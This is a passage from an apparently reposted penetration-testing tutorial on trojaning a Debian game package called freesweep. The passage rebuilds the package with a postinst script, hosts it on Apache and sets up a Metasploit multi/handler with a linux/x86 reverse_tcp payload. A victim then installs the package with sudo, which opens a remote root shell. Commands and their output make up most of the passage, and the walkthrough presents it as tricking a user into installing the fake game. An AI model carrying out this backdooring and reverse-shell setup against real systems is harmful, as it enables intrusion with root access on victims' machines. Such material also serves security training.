/tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. root@kali:/tmp/evil# mv work.deb freesweep.deb root@kali:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. root@kali:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. root@kali:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. ubuntu@ubuntu:~$ wget [Hidden Content] ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root) Source: [HIDE][Hidden Content]]